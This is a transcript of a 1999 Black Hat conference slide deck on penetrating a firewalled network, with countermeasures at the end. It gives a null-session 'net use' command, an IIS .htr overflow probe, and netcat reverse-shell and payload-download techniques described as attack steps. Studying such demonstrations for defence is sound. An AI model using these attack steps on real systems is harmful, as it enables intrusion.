Presentation is loading. Please wait.

Presentation is loading. Please wait.

© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.

Published bySpencer Hudson Modified over 9 years ago

Similar presentations

Presentation on theme: "© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze."— Presentation transcript:

1 © 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze Ernst & Young LLP

2 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Session Objective  Discuss common DMZ and host configuration weaknesses  Demonstrate what may happen if a hacker were to exploit these weaknesses  Present countermeasures to help secure the network and related hosts

3 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Network Diagram 10.1.1.20 10.1.1.10 172.16.1.200 172.16.1.50 192.168.1.20

4 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Network Design  Internet router is blocking tcp/udp ports 135-139  NT Web Server (SP3) is dual-homed  Firewall allows only outbound http (80) and smtp (25) traffic

5 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Hacker’s Objective Gain Control over Internal NT Server from the Internet

6 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 SysAdmin’s Objective Identify Holes in the Environment and Close Them

7 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Target Selection  Ping Sweep  gping, fping  Port Scan  nmap  NetscanTools Pro 2000  OS Identification  nmap -O  queso  Banner Grabbing  VisualRoute, Netcat

8 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 ttdb  Buffer overflow in rpc.ttdbserver  Allows user to execute arbitrary code  Arbitrary code may be executed that will shell back xterm as root

9 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Netcat Redirection 10.1.1.20 172.16.1.50 172.16.1.200

10 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Netcat Redirection  Attack Linux listens on 139 and redirects to 1139 on Sparc  Sparc listens on 1139 and redirects to 139 on NT Web Server  Attack NT issues NetBIOS request to Attack Linux  NetBIOS request is forwarded over Router to NT Web Server

11 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Enumerate NT Information  Null Session  net use \\172.16.1.50\ipc$ “” /user:””  NetUserEnum (local, global, DumpACL)  NetWkstaTransportEnum (Getmac)  RpcMgmt Query (EPDump)

12 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Privilege Escalation  Plant sechole on NT Server  Execute sechole via http  IUSR account becomes admin  Add new user account (via http)  Add new user account to Administrator group (via http)

13 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 IIS Buffer Overflow  Determine if Server is vulnerable  nc 172.16.1.200 80  GET /.htr HTTP/1.0  Evaluate response  Crash IIS and Send Payload  Target server contacts our web server and downloads payload  payload executes on server and contacts our attack host

14 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 VNC

15 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Pass The Hash  Modified SMB client can mount shares (C$, etc) on a remote NT host using only the username and password hash  No need to “decrypt” the password hash  Concept first presented by Paul Ashton in an NTBugtraq post

16 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Pass The Hash v.2  Create an admin account on our own NT host with same name as the admin account for which we have hash values  Upload the hash values into memory on our own NT host  Perform pass-through authentication to target host  No need to “decrypt” the password

17 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Network Diagram 10.1.1.20 172.16.1.200 172.16.1.50 192.168.1.20

18 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Shovel The Shell 10.1.1.20 192.168.1.20

19 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Shovel The Shell  Launch two Netcat Listeners on Attack1a (ports 80 and 25)  Execute Trojan on NT Server:  Netcat TO port 80 on AttackLinux  Commands typed on AttackLinux (port 80) are piped to CMD.exe on NT Server  CMD.exe output is Netcatted TO port 25 on AttackLinux  Type commands in 80 window, view output in 25 window

20 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Network Countermeasures  Block ALL ports at the border routers  Open only those ports that support your security policy  Review Logs  Implement Network and Host Intrusion Detection

21 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Unix Countermeasures  TTDB  Kill the "rpc.ttdbserverd" process  Apply vendor specific patches  Block low and high numbered RPC locator services at the border router  Xterm  Remove trusted relationships with xhost -  If sending sessions to another terminal, restrict to a specific terminal  Block ports 6000-6063 if necessary

22 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 NT Countermeasures  Block tcp and udp ports 135, 137, 138 and 139 at the router.  Prevent Information leakage:  Utilize the Restrict anonymous registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Lsa\ RestrictAnonymous DWORD =1  Unbind “WINS Client (TCP/IP)” from the Internet-connected NIC

23 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 NT Countermeasures  Password composition  7 characters is the strongest humanly usable length, 14 is the strongest  Use meta-characters within the first 7 characters of your password  Utilize account lockout  Utilize the passfilt.dll to require stronger passwords  Utilize Passprop.exe admin lockout feature

24 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 NT Countermeasures  Apply current service packs and security related hotfixes  Review IIS security checklist: www.microsoft.com/security/products/iis/CheckList.asp

25 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Countermeasures Disclaimer:  Test all changes on a non- production host before implementing on production servers

26 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Tools and Concepts  Visual Routewww.visualroute.com  NetScanTools Prowww.nwpsw.com  gping, fpingwww.securityfocus.com  nmapwww.insecure.org/nmap/  quesowww.apostols.org/projectz/  ttdb exploitwww.securityfocus.com  netcatwww.l0pht.com  rinetdwww.boutell.com

27 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Tools and Concepts  VMWarewww.vmware.com  NT Resource Kitwww.microsoft.com  DumpACLwww.somarsoft.com  secholewww.cybermedia.co.in  pwdumpwww.rootshell.com  L0phtCrackwww.l0pht.com  VNCwww.uk.research.att.com  modified SMB clientwww.ntbugtraq.com

28 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Security Resources  www.microsoft.com/security  Advisories  Patches  IIS Security Checklist  www.securityfocus.com  Bugtraq Mailing List  Tools, Books, Links  Vulnerabilities and Fixes

29 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Osborne/ McGraw-Hill Hacking Exposed: Network Security Secrets and Solutions George Kurtz Stuart McClure Joel Scambray Due Out September 1999

30 e © 1999 Ernst & Young LLP e treme hacking Black Hat 1999 Contact Information  George Kurtz  george.kurtz@ey.com  (201) 836-5280  Eric Schultze  eric.schultze@ey.com  (425) 990-6916  Web Site  www.ey.com/security

Download ppt "© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze."

Similar presentations

Expose the Vulnerability Paul Hogan Ward Solutions.

Expose the Vulnerability Paul Hogan Ward Solutions.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
One-Way Hacking: Futility of Firewalls in Web Hacking JD Glaser, Saumil Shah Foundstone Inc.

One-Way Hacking: Futility of Firewalls in Web Hacking JD Glaser, Saumil Shah Foundstone Inc.
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN 0-07-212773-2.

Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost 127.0.0.1 (loopback address)  Internal networks 

Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost (loopback address)  Internal networks 
TCP/IP - Security Perspective Upper Layers CS-431 Dick Steflik.

TCP/IP - Security Perspective Upper Layers CS-431 Dick Steflik.
Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.

Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.
Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.

Firewall 2 * Essential Network Security Book Slides. IT352 | Network Security |Najwa AlGhamdi 1.
Hacking Web Server Defiana Arnaldy, M.Si 0818 0296 4763.

Hacking Web Server Defiana Arnaldy, M.Si
Hacking Unix/Linux.

Hacking Unix/Linux.
The Five Most Popular Attacks on the Internet Peter Mell, 1-7-98 National Institute of Standards and Technology Computer Security Division.

The Five Most Popular Attacks on the Internet Peter Mell, National Institute of Standards and Technology Computer Security Division.
1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.

1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.
Chapter 6 Enumeration Modified 9-28-09. Objectives  Describe the enumeration step of security testing  Enumerate Microsoft OS targets  Enumerate NetWare.

Chapter 6 Enumeration Modified Objectives  Describe the enumeration step of security testing  Enumerate Microsoft OS targets  Enumerate NetWare.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
Copyright © 2002 ProsoftTraining. All rights reserved. Operating System Security.

Copyright © 2002 ProsoftTraining. All rights reserved. Operating System Security.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

Similar presentations

Ads by Google